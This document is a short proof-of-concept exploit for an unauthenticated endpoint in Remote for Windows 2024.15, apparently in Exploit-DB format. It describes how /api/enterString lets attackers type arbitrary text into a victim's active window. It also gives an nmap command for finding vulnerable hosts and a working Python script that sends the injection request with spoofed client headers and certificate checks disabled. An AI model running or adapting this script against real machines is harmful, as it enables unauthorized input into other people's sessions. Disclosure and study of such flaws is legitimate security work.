# Exploit Title: Remote for Windows 2024.15 - Unauthenticated Arbitrary
Input into Active Window
# Date: 2025-05-23
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://rs.ltd
# Software Link: https://rs.ltd/latest.php?os=win
# Version: 2024.15
# Tested on: Windows 10/11 with Remote for Windows (helper)


'''
Description:
- The enterString API endpoint allows unauthenticated attackers to inject
raw text into the target's active window without requiring keystroke
simulation or special keycodes.
- Works when "Allow unknown devices" setting is enabled (default: disabled)


Vulnerable Component:
- The /api/enterString endpoint with missing authentication checks


# Identification:
nmap -p- -T4 <TARGET_IP> --script ssl-cert
Look for SSL cert with subject: CN=SecureHTTPServer/O=Evgeny Cherpak/C=US
'''

import requests
import urllib3
urllib3.disable_warnings()

TARGET_IP = "192.168.8.105"
TEXT_TO_INJECT = "This text appears verbatim on the target"

response = requests.post(
    f"https://
{TARGET_IP}:49762/api/enterString={requests.utils.quote(TEXT_TO_INJECT)}",
    headers={
        "X-ClientToken": "unchecked",
        "X-HostName": "any",
        "X-HostFullModel": "any"
    },
    verify=False
)
print(f"Status: {response.status_code}")